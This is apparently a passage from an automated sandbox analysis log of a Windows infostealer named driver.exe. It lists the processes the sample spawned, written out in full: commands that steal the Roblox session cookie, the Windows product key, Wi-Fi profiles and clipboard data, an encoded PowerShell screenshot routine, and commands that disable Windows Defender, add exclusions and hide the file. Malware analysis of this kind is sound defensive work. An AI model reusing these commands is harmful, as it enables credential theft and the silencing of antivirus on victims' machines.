              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\driver.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF5CD.tmp" "c:\Users\user\AppData\Local\Temp\c4gv4hox\CSCF22C8917EB0C431F96BD8AEEEA495758.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
